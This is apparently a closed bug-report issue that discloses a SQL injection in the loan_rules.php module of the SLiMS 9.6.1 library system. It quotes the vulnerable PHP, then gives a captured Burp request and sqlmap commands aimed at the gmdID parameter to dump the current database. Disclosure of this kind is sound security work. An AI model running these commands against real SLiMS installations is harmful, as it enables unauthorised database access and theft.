Closed
Description
The bug
A SQL Injection exists in admin/modules/circulation/loan_rules.php at the code below
/* RECORD OPERATION */
if (isset($_POST['saveData'])) {
$data['member_type_id'] = $_POST['memberTypeID'];
$data['coll_type_id'] = $_POST['collTypeID'];
$data['gmd_id'] = $_POST['gmdID'];
$data['loan_limit'] = trim($_POST['loanLimit']);
$data['loan_periode'] = trim($_POST['loanPeriode']);
$data['reborrow_limit'] = trim($_POST['reborrowLimit']);
$data['fine_each_day'] = trim($_POST['fineEachDay']);
$data['grace_periode'] = trim($_POST['gracePeriode']);
$data['input_date'] = date('Y-m-d');
$data['last_update'] = date('Y-m-d');
// create sql op object
$sql_op = new simbio_dbop($dbs);
if (isset($_POST['updateRecordID'])) {
/* UPDATE RECORD MODE */
// remove input date
unset($data['input_date']);
// filter update record ID
$updateRecordID = (integer)$_POST['updateRecordID'];
// update the data
$update = $sql_op->update('mst_loan_rules', $data, 'loan_rules_id='.$updateRecordID);
if ($update) {
toastr(__('Loan Rules Successfully Updated'))->success();
echo '<script language="Javascript">parent.jQuery(\'#mainContent\').simbioAJAX(parent.jQuery.ajaxHistory[0].url);</script>';
} else { toastr(__('Loan Rules FAILED to Updated. Please Contact System Administrator')."\nDEBUG : ".$sql_op->error)->error(); }
exit();
} else {
/* INSERT RECORD MODE */
$insert = $sql_op->insert('mst_loan_rules', $data); // BUG HERE
if ($insert) {
toastr(__('New Loan Rules Successfully Saved'))->success();
echo '<script language="Javascript">parent.jQuery(\'#mainContent\').simbioAJAX(\''.$_SERVER['PHP_SELF'].'\');</script>';
} else { toastr(__('Loan Rules FAILED to Save. Please Contact System Administrator')."\n".$sql_op->error)->error(); }
exit();
}
exit();
} To Reproduce
Steps to reproduce the behavior:
-
Login as admin or user that has access to circulation
-
make sure burp suit is on to capture the request such as below:
-
save the request into a file (example.req)
-
run the test with sqlmao with the command
sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql -
voila
example.req
POST /slims9_bulian-9.6.1/admin/modules/circulation/loan_rules.php?action=detail&ajaxload=1 HTTP/1.1
Host: localhost
Content-Length: 1195
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypqBOyIslkQAaoPCi
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=circulation
Accept-Encoding: gzip, deflate
Accept-Language: id,en-US;q=0.9,en;q=0.8,ru;q=0.7
Cookie: SenayanAdmin=d79m01ubrn9d8cagafoflttg3m; admin_logged_in=1; SenayanMember=q0e3uf77qcmobchek4aciibpul; PHPSESSID=rh1hmcqfrm2a33e96b5lmtujn0
Connection: close
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="csrf_token"
98420c7b2b5656890daf0f80b7756a6bb63fac37cb8ad1ac40a7b3ab4cde54c9
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="form_name"
mainForm
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="memberTypeID"
1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="collTypeID"
1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="gmdID"
0
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="loanLimit"
1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="loanPeriode"
1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="reborrowLimit"
1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="fineEachDay"
1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="gracePeriode"
1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="saveData"
Save
------WebKitFormBoundarypqBOyIslkQAaoPCi--
Screenshots
proof-of-concept current database
command to run sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql --current-db

versions
- Browser: Google Chrome | 115.0.5790.114 (Official Build) (x86_64)
Slims Version: slims9_bulian-9.6.1
notes
added comment of the bug. last edit at 18 August 2023 21.12 GMT+7